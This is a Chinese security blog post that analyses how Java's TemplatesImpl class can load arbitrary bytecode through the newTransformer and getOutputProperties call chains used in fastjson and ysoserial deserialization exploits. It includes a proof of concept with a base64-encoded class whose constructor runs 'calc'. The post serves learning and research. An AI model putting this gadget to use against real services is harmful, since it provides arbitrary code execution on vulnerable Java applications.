利用TemplatesImpl加载字节码

最新推荐文章于 2024-02-29 15:38:32 发布
最新推荐文章于 2024-02-29 15:38:32 发布
阅读量412 收藏 1
点赞数
分类专栏: # java漏洞 文章标签: 经验分享 web安全 安全 java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/128901343
版权

一、TemplatesImpl

虽然大部分上层开发者不会直接使用到defineClass方法,但是Java底层还是有一些类用到了它(否则他 也没存在的价值了对吧),这就是TemplatesImpl
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 这个类中定义了一个内部类 TransletClassLoader
这个类里重写了defineClass 方法,并且这里没有显式地声明其定义域。Java中默认情况下,如果一个 方法没有显式声明作用域,其作用域为default,为包作用域, 即可以在同一个包内被调用 。所以也就是说这里的defineClass 由其父类的 protected类型变成了一个default类型的方法,可以被类外部调用。

二、调用分析

我们从TransletClassLoader#defineClass() 向前追溯一下调用链:
  • TemplatesImpl 类中只有一个方法 TemplatesImpl#defineTransletClasses 用到了 TransletClassLoader 类,但是 TemplatesImpl#defineTransletClasses 是 private 类型。继续跟看哪调用了 TemplatesImpl#defineTransletClasses 方法。
  • 有三个方法调用了 TemplatesImpl#defineTransletClasses(), 其中 TemplatesImpl#getTransletIndex() 是 public 类型的TemplatesImpl#getTransletClasses() 和 TemplatesImpl#getTransletInstance() 是 private 属性的
public synchronized int getTransletIndex()            //直接调用发现没有成功
private synchronized Class[] getTransletClasses()
private Translet getTransletInstance()
这里可以尝试直接用 TemplatesImpl#getTransletIndex(),那么调用链如下:但是发现并没有成功。
TemplatesImpl#getTransletIndex() -> TemplatesImpl#defineTransletClasses() -> TemplatesImpl#defineTransletClasses() -> defineClass
  • 继续跟 TemplatesImpl#getTransletClasses() 和 TemplatesImpl#getTransletInstance(), TemplatesImpl 类中已经没有调用 getTransletClasses() 的方法了,而 getTransletInstance() 方法在 public synchronized Transformer newTransformer 方法中被调用了,所以构造如下链,P牛用的就是如下的链。
TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() ->TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()  
  • 再继续跟进 TemplatesImpl#newTransformer() 发现 TemplatesImpl#getOutputProperties() 调用了 TemplatesImpl#newTransformer() 并且它也是 public 类型的,如下也成功触发。(这一利用链也正好符合了fastjson的利用条件)
TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()

三、利用分析:

1.setFieldValue 方法是ysoserial中用来设置私有属性的
  • _bytecodes 是由字节码组成的数组;
  • _name 可以是任意字符串,只要不为null即可;
  • _tfactory 需要是一个TransformerFactoryImpl 对象,因为 TemplatesImpl#defineTransletClasses() 方法里有调用到 _tfactory.getExternalExtensionsMap() ,如果是null会出错。
2.TemplatesImpl 中对加载的字节码是有一定要求的:这个字节码对应的类必须 是com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的子类。
  • 例如如下代码中继承了AbstractTranslet。
  • 构造函数中执行calc弹出计算器。 
package com.TemplastesImplTest;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class codeTest extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
    public codeTest() throws Exception{
        Runtime.getRuntime().exec("calc");
    }
}
  • 进行base64编码
  • 替换到图下code对象代码中,执行即可弹出计算器 
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.util.Base64;
import static ysoserial.payloads.util.Reflections.setFieldValue;

public class TemplatesTest {
    public static void main(String[] args) throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "test");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        obj.newTransformer();
    }
}
参考:
Thunderclap_
关注
专栏目录
fastjson反序列化TemplatesImpl
qq_40710190的博客
07-07 795
FastJson的TemplateImpl利用
Fastjson反序列化漏洞TemplateImpl利用链条跟踪与分析
Armandhe的博客
11-04 608
Fastjson反序列化漏洞TemplateImpl利用链条跟踪与分析
[Java安全]利用TemplatesImpl执行字节码
Y4tacker的博客
07-25 3000
文章目录defineClass利用TemplatesImpl执行字节码 defineClass 介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码 public class TouchFile{ public TouchFile() throws Exception { Runtime.getRuntime().exec("calc"); } } 把它编译成字节码后Base64 之后运行 Method defineClass =
Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)
Y4tacker的博客
09-13 700
文章目录写在前面流程分析 写在前面 关于TemplatesImpl加载字节码就不多说了,之前也写过自己翻一翻,或者网上看看其他大佬的,至于为什么选择这一个,因为这里面大多数过程都有,除了$ref,算是比较全面了 流程分析 核心代码 public class test1 { public static void main(String[] args) throws Exception{ String payload = "{\"@type\":\"com.sun.org.apache
Java安全-动态加载字节码
XINO
08-17 683
首先我们来看看什么是JAVA字节码Java字节码Java虚拟机执行的一种虚拟指令格式。换一种说法就是编译后得到的class文件内容,本质上就是JVM执行使用的一指令。可以说是**所有能够恢复成一个并在JVM虚拟机里加载的字节序列。个人理解就是利用一些方法去执行class文件内容。**接下来给大家带来几种加载字节码的方法。...
TemplatesImplGadget中提取bytecode
fnmsd的博客
03-22 4427
大半年前开的头,扔那就给忘了,终于想起来给写完了(*/ω\*)
JAVA笔记??序列化
12-22
所谓的对象序列化(在很多地方也被成为串行化),是指将对象转换成二进制数据流的一种实现手段。通过将对象序列化,可以方便地实现对象的传输及保存。  在Java中提供有ObjectInputStream与ObjectOutputStream这两...
fastjson反序列化分析
hongduilanjun的博客
03-16 2594
1.fastjson简单使用 User: package com.naihe; public class User { private String name; private int age; public User() {} public User(String name, int age) { this.name = name; this.age = age; } public String getName
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2290
Fastjson组件反序列化分析,从基础到RCE的过程笔记
Java中动态加载字节码的方法 (持续补充)
mole_exp的博客
02-10 2789
汇总并持续补充Java中动态加载字节码的方法。
Fastjson 1.2.24远程代码执行漏洞(com.sun.rowset.JdbcRowSetImpl
further_eye的博客
11-16 4062
漏洞是利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险,并调用危险连接远程rmi主机,通过其中的恶意执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大的影响。
ysoserial Gadgets.createTemplatesImpl函数分析
fnmsd的博客
03-13 3272
前言 在阅读《java反序列化工具ysoserial分析》之后,对ysoserial有了一些更深的了解,但文章在对createTemplatesImpl函数进行分析时有一些缺失,没有解释一些代码作用,本文是对createTemplatesImpl函数分析的一些补充及一些疑问。 在阅读本文前请先阅读《java反序列化工具ysoserial分析》中关于createTemplatesImpl分析的部分 ...
[Java安全]Fastjson 1.2.22-1.2.24 TemplatesImpl利用链分析
cosmoslin的博客
04-18 661
简介 对于Fastjson 1.2.22-1.2.24 版本的反序列化漏洞的利用,目前已知的主要有以下的利用链: 基于TemplateImpl; 基于JNDI(又分为基于Bean Property型和Field型); 这里我使用的环境是JDK7u51 fastjson-1.2.24.jar,commons-codec-1.12.jar,commons-io-2.5.jar,unboundid-ldapsdk-4.0.9.jar 反序列化TemplatesImpl+加载触发 先看一下POC: Te
[Java反序列化]Java-CommonsCollections2TemplatesImpl利用链分析
Y4tacker的博客
07-28 502
文章目录Java-CommonsCollections2TemplatesImpl利用链分析完整代码 Java-CommonsCollections2TemplatesImpl利用链分析 我们知道我们之前可以利用TemplatesImpl 构造出⽆Transformer数组的利⽤链,那这里是否可以实现呢,答案是是的,在这里的queue 现在开始正文,还是稍微详细说一下利用过程吧 现在我们的目标就是通过PriorityQueue来调用TemplatesImpl的newTransformer来加载字节码 T
TemplatesImpl在Shiro中的利用
Le1a's Blog
03-23 3109
TemplatesImpl在Shiro中的利用 文章首发自: https://www.le1a.com/posts/6e876d26/ 前言 前面学习了CC1、CC3和CC6,其中CC6是不限制版本的一条链,那么为什么还要用到TemplatesImpl这条链呢?不妨我们设想一下:命令执行和代码执行到底谁更有价值? 例如在PHP中会遇到一个场景,call_user_func和eval都能造成的代码执行,而更多的人愿意使用eval,原因是call_user_func在某种情况下会被限制不能使用assert和sy
Java 反序列化漏洞-Apache Commons Collections3
cjdgg的博客
03-02 4704
Java 反序列化漏洞-Apache Commons Collections3前言javassist+TemplatesImplcom.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 前言 之前已经学了CC1和CC2,接下来继续学习CC3。在CC2中我们用到了javassist修改字节码并配合TemplatesImpl攻击链来使用,因此我们很自然而然的想到,如果我们直接用javassist修改字节码并配合TemplatesImpl攻击链使用,就无需用I
Java 反序列化漏洞--fastjson-1.2.24--TemplatesImpl攻击链
cjdgg的博客
02-24 1265
Java-fastjson-1.2.24反序列化漏洞前置知识漏洞分析getTransletInstance()newTransformer()getOutputProperties() 前置知识 fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 这里帮运一下素十八大佬总结的fastjson的功能要点 *1.使用 JSON.parse(jsonString)
WebJava反序列化之从CC3看TemplatesImpl利用
最新发布
uuzeray的博客
02-29 1256
都在InvokerTransformer上,若WAF直接禁用了该,我们可以用CC3来突破,CC3的sink在于上面提到的TemplatesImpl的newTransformer方法,它最后会调用defineClass(),将字节码初始化成一个可控的,若该是有着精心构造的静态方法的恶意,便可以完成攻击。在 Java 反序列化漏洞中,攻击者通常会构造恶意的序列化数据,通过触发反序列化操作来执行恶意代码。那么,接下来的问题是,从哪里去触发TemplatesImpl的newTransformer方法呢?
JVM加载字节码全过程解析
"JVM-字节码文件加载过程.md" Java虚拟机(JVM)是Java程序运行的核心,它负责加载、验证、准备、解析和初始化字节码文件,也就是我们常说的.class文件。这个过程确保了Java程序的正确执行和安全性。 1. 加载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值